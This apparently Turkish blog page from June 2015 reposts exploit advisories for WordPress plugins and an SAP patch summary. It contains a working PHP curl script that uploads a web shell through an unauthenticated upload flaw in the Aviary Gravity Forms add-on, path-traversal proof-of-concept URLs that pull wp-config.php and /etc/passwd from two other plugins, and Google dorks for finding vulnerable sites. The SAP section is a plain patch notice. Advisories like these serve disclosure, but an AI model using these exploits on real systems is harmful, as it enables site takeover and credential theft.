-
12 Haziran 2015 Cuma
WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload



Title: Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-07
Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
Vendor: Waters Edge Web Design and NetherWorks LLC
Vendor Notified: 2015-06-08
Advisory: http://www.vapid.dhs.org/advisory.php?v=125
Vendor Contact: plugins@wordpress.org
Description: A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin.
Vulnerability:
There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an unauthenticated user can upload any file to the system. Including a .php file. The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server.

In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php the code doesn’t check for an authenticated Wordpress user:

1 <?php
2
3 $filename = $_SERVER["DOCUMENT_ROOT"]."/wp-load.php";
4 if (file_exists($filename)) {
5 include_once($filename);
6 } else {
7 include_once("../../../../wp-load.php");
8 }
9 echo "Here";
10 $image_file = $_FILES['gf_aviary_file'];
11 if($image_file['name']!=''){
12 $max_file_size = 4*1024*1024;
13 $file_size = intval($image_file['size']);
14 if( $file_size > $max_file_size ){
15 $msg = "File Size is too big.";
16 $error_flag = true;
17 }
18 $extension = strtolower(end(explode('.', $image_file['name'])));
19 $aa_options = get_option('gf_aa_options');
20 $supported_files = $aa_options['supported_file_format'];
21 $supported_files = strtolower($supported_files);
22 if(!$error_flag && $supported_files != '' ){
23 $supported_files = explode (',', $supported_files);
24 if(!in_array($extension, $supported_files)){
25 $msg = "No Supported file.";
26 $error_flag = true;
27 }
28 }
29 if(!$error_flag){
30 $wp_upload_dir = wp_upload_dir();
31 if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){
32 mkdir($wp_upload_dir['basedir'].'/gform_aviary');
33 }
34 $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/';
35 $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/';
36 $file_name = $upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name' ];
37 if(move_uploaded_file($image_file['tmp_name'], $file_name)){
38 $file_url = $upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['na me'];
39 }
40 }
41 $return_obj = array('status' => 'success', 'message' => $file_url);
42 echo json_encode($return_obj);
43 }
44 ?>

CVEID: 2015-4455
OSVDB:
Exploit Code:
• <?php
• /*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
• /*Larry W. Cashdollar @_larry0
• 6/7/2015
• shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
• */


• $target_url = 'http://www.vapidlabs.com/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/
• upload.php';
• $file_name_with_full_path = '/var/www/shell.php';

• echo "POST to $target_url $file_name_with_full_path";
• $post = array('name' => 'shell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);

• $ch = curl_init();
• curl_setopt($ch, CURLOPT_URL,$target_url);
• curl_setopt($ch, CURLOPT_POST,1);
• curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
• curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
• $result=curl_exec ($ch);
• curl_close ($ch);
• echo "<hr>";
• echo $result;
• echo "<hr>";
• ?>
DEVAMINI OKU..
Wordpress History Collection <=1.1.1 Arbitraty File Download



# Exploit Title: Wordpress History Collection <=1.1.1 Arbitraty File Download
# Google Dork: inurl:plugins/history-collection
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/history-collection/
# Version: <=1.1.1
# Tested on: Linux

I-Description:
Wordpress history collection plugin contains a file called download.php
which is not filtering the GET input, it then uses this get input value to
force the download of a file.
(download.php, line 44):
header("Content-Disposition: attachment;
filename=\"".basename($filename)."\";" );
2:Proof of concept:
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=yourfile
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php
php -r "echo @file_get_contents('
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php')
;"

Greetz:
Moh Ooasiic, Virus Os, Black Sniper, T3N38R15, Green Ghost, n37_worm,
MuhmadEmad, redsm0ke
By Kuroi'SH
DEVAMINI OKU..
Paypal Currencucy Converter Basic For Woocommerce File Read



# Exploit Title: Paypal Currencucy Converter Basic For Woocommerce File Read
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
# Version: <=1.3
# Tested on: Linux
Description:
proxy.php's code:
<?php
$file = file_get_contents($_GET['requrl']);
$left=strpos($file,'<div id=currency_converter_result>');
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
$snip= substr($file,$left,$right);
echo $snip;
?>
Based on user input, the content of a file is printed out (unfortunately not included) so any html file can be loaded, and an attacker may be able to read any local file which is not executed in the server.

Example:
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd

POC:
curl --silent --url
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
DEVAMINI OKU..
SAP XXE / Hardcoded Credentials / SQL Injection / Overflow






SAP XXE / Hardcoded Credentials / SQL Injection / Overflow
Published
Credit
Risk
2015.06.12

Darya Maenkova

Medium

CWE
CVE
Local
Remote
CWE-89

N/A

No

Yes



SAP <http://www.sap.com/>has released the monthly critical patch update
for June 2015. This patch update closes a lot of vulnerabilities in SAP
products. The most popular vulnerability is Missing Authorization Check.
This month, three critical vulnerabilities found by ERPScan researchers
Vahagn Vardanyan, Rustem Gazizov, and Diana Grigorieva were closed.

*Issues that were patched with the help of ERPScan*

Below are the details of SAP vulnerabilities that were found byERPScan
<http://www.erpscan.com/>researchers.

* An XML eXternal Entity vulnerability in SAP Mobile Platform
on-premise (CVSS Base Score:5.5).Updateis available in SAP Security
Note2159601 <https://service.sap.com/sap/support/notes/2159601>. An
attacker can use XML eXternal Entities to send specially crafted
unauthorized XML requests, which will be processed by the XML
parser. The attacker will get unauthorized access to the OS file system.
* A Hardcoded Credentials vulnerability in SAP Cross-System Tools
(CVSS Base Score:3.6).Updateis available in SAP Security Note2059659
<https://service.sap.com/sap/support/notes/2059659>. An attacker can
use hardcoded credentials for unauthorized access and perform
various actions in the system. In addition, it is likely that the
code will be implemented as a backdoor into the system.
* A Hardcoded Credentials vulnerability in SAP Data Transfer Workbench
(CVSS Base Score:2.1).Updateis available in SAP Security Note2057982
<https://service.sap.com/sap/support/notes/2057982>. An attacker can
use the hardcoded credentials for unauthorized access and perform
various actions in the system. In addition, it is likely that the
code will be implemented as a backdoor into the system.


*The most critical issues found by other researchers*

Some of our readers and clients asked us to categorize the most critical
SAP vulnerabilities to patch them first. Companies providing SAP
Security Audit, SAP Security Assessment, or SAP Penetration Testing
services can include these vulnerabilities in their checklists. The most
critical vulnerabilities of this update can be patched by the following
SAP Security Notes:

* 2151237 <https://service.sap.com/sap/support/notes/2151237>: SAP GUI
for Windows has a Buffer Overflow vulnerability (CVSS Base
Score:9.3). An attacker can use Buffer Overflow for injecting
specially crafted code into working memory, which will be executed
by the vulnerable application under the privileges of that
application. This can lead to the attacker taking complete control
over the application, denial of service, command execution, and
other attacks. In case of command execution,attackercan obtain
critical technical and business-related information stored in the
vulnerable SAP-system or escalate their own privileges. As for
denial of service, the process of the vulnerable component may be
terminated. For this time, nobody will be able to use this service,
which negatively influences business processes, system downtime,
and, consequently, business reputation. It is recommended to install
this SAP Security Note to prevent risks.
* 2129609 <https://service.sap.com/sap/support/notes/2129609>: SAP EP
JDBC Connector has an SQL Injection vulnerability (CVSS Base
Score:6.5). An attacker can use SQL Injections with the help of
specially crafted SQL queries. They can read and modify sensitive
information from a database, execute administrative operations in a
database, destroy data or make it unavailable. In some cases, an
attacker can access system data or execute OS commands. It is
recommended to install this SAP Security Note to prevent risks.
* 1997734 <https://service.sap.com/sap/support/notes/1997734>: SAP RFC
runtime has a Missing AuthorizationXheckvulnerability (CVSS Base
Score:6.0). An attacker can use Missing Authorization Checks to
access a service without any authorization procedures and use
service functionality that has restricted access. This can lead to
information disclosure, privilege escalation, and other attacks. It
is recommended to install this SAP Security Note to prevent risks.
* 2163306 <https://service.sap.com/sap/support/notes/2163306>: SAP
CommonCryptoLib and SAPCRYPTOLIB are vulnerable to FREAK
(CVE-2015-0204, CVSS Base Score:5.0). It allows an attacker to
intercept HTTPS connections between vulnerable clients and servers
and force them to use weakened encryption, which the attacker can
break to steal or manipulate sensitive data. All the attacks on this
page assume a network adversary (i.e. a man-in-the-middle) to tamper
with TLS handshake messages. The typical scenario to mount such
attacks is by tampering with the Domain Name System (DNS), for
example via DNS rebinding or domain name seizure. This attack
targets a class of deliberately weak export cipher suites. It is
recommended to install this SAP Security Note to prevent risks.


*References about the FREAK vulnerability:*

* SMACK: State Machine AttaCKs <https://www.smacktls.com/>
* Tracking the FREAK Attack <https://freakattack.com/>
* CVE-2015-0204
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204>


It is highly recommended to patch all those SAP vulnerabilities to
prevent business risks affecting your SAP systems.

SAP has traditionally thanked the security researchers from ERPScan for
found vulnerabilities on theiracknowledgment page
<http://scn.sap.com/docs/DOC-8218>.

Advisories for those SAP vulnerabilities with technical details will be
available in 3 months onerpscan.com <http://www.erpscan.com/>.

--

Darya Maenkova

PR manager

<https://www.linkedin.com/company/2217474?trk=ppro_cprof>
<https://twitter.com/erpscan>

<http://erpscan.com/>

------------------------------------------------------------------------

e-mail: d.maenkova@erpscan.com <mailto:d.maenkova@erpscan.com>

address: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301

phone: 650.798.5255

erpscan.com <http://erpscan.com>
DEVAMINI OKU..
Kaydol: Yorumlar ( Atom )